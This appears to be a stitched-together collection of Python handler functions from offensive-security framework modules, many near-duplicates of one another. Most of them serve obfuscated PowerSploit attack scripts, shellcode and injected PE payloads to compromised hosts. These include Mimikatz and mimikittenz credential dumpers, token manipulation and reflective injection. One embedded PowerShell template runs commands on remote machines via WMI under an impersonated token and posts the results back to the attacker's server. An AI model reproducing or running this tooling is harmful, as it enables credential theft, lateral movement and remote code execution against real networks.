def on_request(self, context, request): if 'Invoke-Shellcode.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open( get_ps_script( 'Powersploit/CodeExecution/Invoke-Shellcode.ps1'), 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script) elif os.path.basename(self.shellcode_path) == request.path[1:]: request.send_response(200) request.end_headers() with open(self.shellcode_path, 'rb') as shellcode: request.wfile.write(shellcode.read()) #Target has the shellcode, stop tracking the host request.stop_tracking_host() else: request.send_response(404) request.end_headers()
def on_request(self, context, request): if 'Invoke-TokenManipulation.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open( get_ps_script('Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script) elif 'TokenRider.ps1' == request.path[1:]: request.send_response(200) request.end_headers() #Command to execute on the target system(s) command_to_execute = 'cmd.exe /c {}'.format(self.command) #context.log.debug(command_to_execute) #This will get executed in the process that was created with the impersonated token elevated_ps_command = ''' [Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}; function Send-POSTRequest {{ [CmdletBinding()] Param ( [string] $data ) $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/'); $request.Method = 'POST'; $request.ContentType = 'application/x-www-form-urlencoded'; $bytes = [System.Text.Encoding]::ASCII.GetBytes($data); $request.ContentLength = $bytes.Length; $requestStream = $request.GetRequestStream(); $requestStream.Write( $bytes, 0, $bytes.Length ); $requestStream.Close(); $request.GetResponse(); }} $post_output = ""; $targets = @({targets}); foreach ($target in $targets){{ try{{ Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $target -ArgumentList "{command}"; $post_output = $post_output + "Executed command on $target! `n"; }} catch {{ $post_output = $post_output + "Error executing command on $target $_.Exception.Message `n"; }} }} Send-POSTRequest $post_output'''.format( server=context.server, addr=context.localip, port=context.server_port, targets=self.target_computers, command=command_to_execute) request.wfile.write(elevated_ps_command) else: request.send_response(404) request.end_headers()
def on_request(self, context, request): if 'Invoke-TokenManipulation.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open(get_ps_script('Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script) elif 'TokenRider.ps1' == request.path[1:]: request.send_response(200) request.end_headers() #Command to execute on the target system(s) command_to_execute = 'cmd.exe /c {}'.format(self.command) #context.log.debug(command_to_execute) #This will get executed in the process that was created with the impersonated token elevated_ps_command = ''' [Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}; function Send-POSTRequest {{ [CmdletBinding()] Param ( [string] $data ) $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/'); $request.Method = 'POST'; $request.ContentType = 'application/x-www-form-urlencoded'; $bytes = [System.Text.Encoding]::ASCII.GetBytes($data); $request.ContentLength = $bytes.Length; $requestStream = $request.GetRequestStream(); $requestStream.Write( $bytes, 0, $bytes.Length ); $requestStream.Close(); $request.GetResponse(); }} $post_output = ""; $targets = @({targets}); foreach ($target in $targets){{ try{{ Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $target -ArgumentList "{command}"; $post_output = $post_output + "Executed command on $target! `n"; }} catch {{ $post_output = $post_output + "Error executing command on $target $_.Exception.Message `n"; }} }} Send-POSTRequest $post_output'''.format(server=context.server, addr=context.localip, port=context.server_port, targets=self.target_computers, command=command_to_execute) request.wfile.write(elevated_ps_command) else: request.send_response(404) request.end_headers()
def payload(self, context, command): ''' Since the chrome decryption feature is relatively new, I had to manully compile the latest Mimikatz version, update the base64 encoded binary in the Invoke-Mimikatz.ps1 script and apply a patch that @gentilkiwi posted here https://github.com/PowerShellMafia/PowerSploit/issues/147 for the newer versions of mimikatz to work when injected. Here we call the updated PowerShell script instead of PowerSploits version ''' with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script: return obfs_ps_script(ps_script.read())
def on_request(self, context, request): if 'Invoke-mimikittenz.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open(get_ps_script('mimikittenz/Invoke-mimikittenz.ps1'), 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), function_name=self.obfs_name) request.wfile.write(ps_script) else: request.send_response(404) request.end_headers()
def on_request(self, context, request): if 'PowerView.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open(get_ps_script('PowerSploit/Recon/PowerView.ps1'), 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read()) request.wfile.write(ps_script) else: request.send_response(404) request.end_headers()
def on_request(self, context, request): if 'PowerView.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open(get_ps_script('Recon/PowerView.ps1'), 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read()) request.wfile.write(ps_script) else: request.send_response(404) request.end_headers()
def on_request(self, context, request): if 'Invoke-Mimikatz.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open(get_ps_script('PowerSploit/Exfiltration/Invoke-Mimikatz.ps1'), 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script) else: request.send_response(404) request.end_headers()
def on_request(self, context, request): if 'Invoke-TokenManipulation.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open(get_ps_script('PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script) else: request.send_response(404) request.end_headers()
def on_request(self, context, request): if 'Invoke-Shellcode.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open(get_ps_script('CodeExecution/Invoke-Shellcode.ps1'), 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script) request.stop_tracking_host() else: request.send_response(404) request.end_headers()
def on_request(self, context, request, launcher, payload): if 'Invoke-TokenManipulation.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open(get_ps_script('PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read()) request.wfile.write(ps_script) elif 'TokenRider.ps1' == request.path[1:]: request.send_response(200) request.end_headers() #Command to execute on the target system(s) request.wfile.write(payload) else: request.send_response(404) request.end_headers()
def on_request(self, context, request, launcher, payload): if "Invoke-TokenManipulation.ps1" == request.path[1:]: request.send_response(200) request.end_headers() with open(get_ps_script("PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1"), "r") as ps_script: ps_script = obfs_ps_script(ps_script.read()) request.wfile.write(ps_script) elif "TokenRider.ps1" == request.path[1:]: request.send_response(200) request.end_headers() # Command to execute on the target system(s) request.wfile.write(payload) else: request.send_response(404) request.end_headers()
def on_request(self, context, request): if 'Invoke-Mimikatz.ps1' == request.path[1:]: request.send_response(200) request.end_headers() ''' Since the chrome decryption feature is relatively new, I had to manully compile the latest Mimikatz version, update the base64 encoded binary in the Invoke-Mimikatz.ps1 script and apply a patch that @gentilkiwi posted here https://github.com/PowerShellMafia/PowerSploit/issues/147 for the newer versions of mimikatz to work when injected. Here we call the updated PowerShell script instead of PowerSploits version ''' with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script) else: request.send_response(404) request.end_headers()
def on_request(self, context, request): if 'Invoke-ReflectivePEInjection.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open(get_ps_script('CodeExecution/Invoke-ReflectivePEInjection.ps1'), 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script) elif os.path.basename(self.payload_path) == request.path[1:]: request.send_response(200) request.end_headers() request.stop_tracking_host() with open(self.payload_path, 'rb') as payload: request.wfile.write(payload.read()) else: request.send_response(404) request.end_headers()
def on_request(self, context, request): if 'Invoke-Shellcode.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open(get_ps_script('CodeExecution/Invoke-Shellcode.ps1') ,'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script) elif os.path.basename(self.shellcode_path) == request.path[1:]: request.send_response(200) request.end_headers() with open(self.shellcode_path, 'rb') as shellcode: request.wfile.write(shellcode.read()) #Target has the shellcode, stop tracking the host request.stop_tracking_host() else: request.send_response(404) request.end_headers()
def on_request(self, context, request): if 'Invoke-ReflectivePEInjection.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open( get_ps_script( 'CodeExecution/Invoke-ReflectivePEInjection.ps1'), 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script) elif os.path.basename(self.payload_path) == request.path[1:]: request.send_response(200) request.end_headers() request.stop_tracking_host() with open(self.payload_path, 'rb') as payload: request.wfile.write(payload.read()) else: request.send_response(404) request.end_headers()
def payload(self, context, command): with open(get_ps_script('mimikittenz/Invoke-mimikittenz.ps1'), 'r') as ps_script: return obfs_ps_script(ps_script.read())
def payload(self, context, command): with open( get_ps_script( 'PowerSploit/CodeExecution/Invoke-Shellcode.ps1'), 'r') as ps_script: return obfs_ps_script(ps_script.read())
def payload(self, context, command): with open( get_ps_script( 'PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as ps_script: return obfs_ps_script(ps_script.read())
def payload(self, context, command): with open(get_ps_script('PowerSploit/Recon/PowerView.ps1'), 'r') as ps_script: return obfs_ps_script(ps_script.read())
def payload(self, context, command): with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script: return obfs_ps_script(ps_script.read())
def payload(self, context, command): with open(get_ps_script('PowerSploit/CodeExecution/Invoke-Shellcode.ps1'), 'r') as ps_script: return obfs_ps_script(ps_script.read())
def payload(self, context, command): with open(get_ps_script("mimikittenz/Invoke-mimikittenz.ps1"), "r") as ps_script: return obfs_ps_script(ps_script.read())
def payload(self, context, command): with open(get_ps_script('PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as ps_script: return obfs_ps_script(ps_script.read())